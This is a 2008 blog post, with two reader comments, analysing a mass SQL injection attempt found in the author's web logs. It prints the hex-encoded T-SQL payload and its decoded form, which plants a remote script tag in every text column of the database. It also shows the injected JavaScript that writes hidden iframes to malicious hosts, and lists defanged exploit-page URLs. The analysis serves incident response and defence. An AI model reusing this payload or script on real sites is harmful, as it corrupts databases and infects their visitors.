Sunday, August 31, 2008

cute...

checking web logs...

71.191.45.109 - - [30/Aug/2008:19:06:39 +0000] "GET /hack/brutessh2.c?';DECLARE%
20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766172636861722832353529
2C40432076617263686172283430303029204445434C415245205461626C655F437572736F722043
5552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F
626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E
6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E7874797065
3D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F43757273
6F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D3029204245
47494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D27
27223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568
756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40
432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E
3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F637372
73732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F
4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F534520546162
6C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4
000));EXEC(@S); HTTP/1.1" 501 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Window
s NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

Decodes to:
DECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id an?? a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@F??TCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''">//script src="hxxp://www0.douh??nqn.cn/csrss/w.js"//script////!--''+['+@??+'] where '+@C+' not like ''%"//script src="hxxp://www0.douhunqn.cn/csr??s/w.js"//script//!--''')FETCH NEXT FRO?? Table_Cursor INTO @T'@C END CLOSE Tab??e_Cursor DEALLOCATE Table_Cursor

the java:

window.onerror=function()
{
document.write("//iframe width="0" height="0" src="hxxp://www0.douhunqn.cn/csrss/new.htm">//iframe>");
return true;
}
if(typeof(js2eus)=="undefined")
{
var js2eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('//iframe marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="hxxp://count41.51yes.com/sa.aspx?id="419214144'+yesdata+'" height="0" width="0">//iframe>');


document.write("//iframe width="0" height="0" src="hxxp://www0.douhunqn.cn/csrss/new.htm">//iframe>");

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(iyesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}

new.htm is nice:

launches several iframes that launch several other attacks. very nice. I'll let you pull down that code.

hxxp://www0.douhunqn.cn/csrss/lzx.htm
hxxp://www0.douhunqn.cn/csrss/IERPCtl.IERPCtl.1
hxxp://www0.douhunqn.cn/csrss/real11.htm
hxxp://www0.douhunqn.cn/csrss/real10.htm
hxxp://www0.douhunqn.cn/csrss/S.S
hxxp://www0.douhunqn.cn/csrss/Bfyy.htm --> Storm Player Exploit

The only exploit that was there was the real11.htm one :-(

new.htm also serves up:
//iframe src=hxxp://www.ppexe.com/csrss/06014.htm width=100 height=0>
//iframe src=hxxp://www.ppexe.com/csrss/flash.htm width=100 height=0>
//Iframe src=hxxp://www.ppexe.com/csrss/net.htm width=100 height=0>
//Iframe src=hxxp://www.ppexe.com/csrss/ff.htm width=100 height=0>

that malware with the .exe's are still available

there is a good write up of most of the code here

http://blogs.technet.com/mmpc/archive/2008/08/28/a-normal-day-at-the-office.aspx

2 comments:

dean said...

This was the same injection string that was used on the three sites that I did the I.R. for.

The Asprox/Danmec bot was the source of the SQLi. I needed to use the same SQLi vector to clean the database. The #$%# database admin was MIA and none of the clients had access to the database. At least they eventually fixed the code in their sites.

I'm not sure if this one is Asprox/Danmec though. The .js does not look to be one of the current ones in use by the bot. This looks to be linked to a Chinese malware site.

/dean

Mubix said...

I noticed the exact same string on my web site's logs. I was actually looking at the logs at the time it happened with the "tail -f". I dropped the GET into the burp suite's decode tab and saw the .cn urls. Dropped those urls into Serversniff.net's File-Info tool and checked out each of the subsequently linked files one at a time just like you did. The thing that was my saving grace was a properly configured mod_security suite along with the excellent .htaccess file done by Ronald of 0x000000.com